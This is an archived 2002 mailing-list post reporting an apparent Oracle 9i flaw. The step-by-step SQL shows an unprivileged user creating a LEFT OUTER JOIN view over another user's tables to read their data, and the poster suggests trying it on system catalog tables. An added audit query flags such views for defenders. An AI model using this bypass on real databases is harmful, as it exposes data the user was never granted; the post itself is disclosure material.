9iDB Security Hole?
Anyone with 9i can confirm this?
From: news [mailto:news_at_host.talk.ru] On Behalf Of ... ...relcom.comp.dbms.oracle
connect system/****@database
CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
TABLESPACE temp;
CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
TABLESPACE temp;
Grant Create Session To us1;
Grant Create Session To us2;
Grant Create Table To us1;
grant unlimited tablespace to us1;
Grant Create View To us2;
Connect us1/us11@database;
Create Table t1(c1 Number(1));
Insert Into t1(c1) Values(9);
Create Table t2(c1 Number(1));
Insert Into t2(c1) Values(9);
commit;
Connect us2/us12@database;
SQL> Select * From us1.t1;
ORA-00942: table or view does not exist
-- this is expected
SQL> Select * From us1.t2;
ORA-00942: table or view does not exist
-- this one too
SQL> Create View aa As Select * From us1.t1;
ORA-00942: table or view does not exist
-- and this one
SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
View created
-- now this one is NOT !!!!!
SQL> select * from aa;
T1_C1 T2_C1
---- ----
9 9
This effectively means that LEFT OUTER JOIN allows creating views
on tables that are normally not visible (provided that the unprivileged user
knows the table and column names).
If you can confirm this basic example, can you also try it on system
catalog tables/views? If you cannot confirm, please specify your version
and platform so that we know which ones are not affected (the poster didn't
specify the version, but I suggest it's 9.0.1.1 on either NT or Linux).
-- Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
All opinions are mine and do not necessarily go in line with those of my employer.

Received on Mon Apr 15 2002 - 10:57:03 CDT
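
An audit query for the condition this thread describes, added here as an example and not part of the original post: it lists views that reference a table or view in another schema although the view owner has no direct or PUBLIC grant on that object and no ANY TABLE system privilege. It assumes an account that can read the DBA_ dictionary views; column-level grants (DBA_COL_PRIVS) are not considered, and the exclusion of SYS and SYSTEM is a choice made for this example.

```sql
-- Added audit query (not from the original post).
-- Candidate views: the owner selects from another schema's table or view
-- without holding a privilege that would normally allow it.
-- Role grants are ignored on purpose: creating a view requires privileges
-- granted directly to the owner (or to PUBLIC), not through a role.
-- 'READ' and 'READ ANY TABLE' exist only in later releases; on older
-- releases those values simply never match.
SELECT d.owner            AS view_owner,
       d.name             AS view_name,
       d.referenced_owner AS base_owner,
       d.referenced_name  AS base_object,
       d.referenced_type  AS base_type
FROM   dba_dependencies d
WHERE  d.type = 'VIEW'
AND    d.referenced_type IN ('TABLE', 'VIEW')
AND    d.referenced_owner <> d.owner
AND    d.referenced_link_name IS NULL          -- local objects only
AND    d.owner NOT IN ('SYS', 'SYSTEM')        -- assumption: skip built-in schemas
AND    NOT EXISTS (                            -- no object-level grant
         SELECT 1
         FROM   dba_tab_privs p
         WHERE  p.owner      = d.referenced_owner
         AND    p.table_name = d.referenced_name
         AND    p.privilege  IN ('SELECT', 'READ')
         AND    p.grantee    IN (d.owner, 'PUBLIC'))
AND    NOT EXISTS (                            -- no blanket system privilege
         SELECT 1
         FROM   dba_sys_privs s
         WHERE  s.privilege IN ('SELECT ANY TABLE', 'READ ANY TABLE')
         AND    s.grantee   IN (d.owner, 'PUBLIC'))
ORDER  BY d.owner, d.name, d.referenced_owner, d.referenced_name;
```

With the objects from the post in place, the view US2.AA would be expected to appear twice, once for US1.T1 and once for US1.T2.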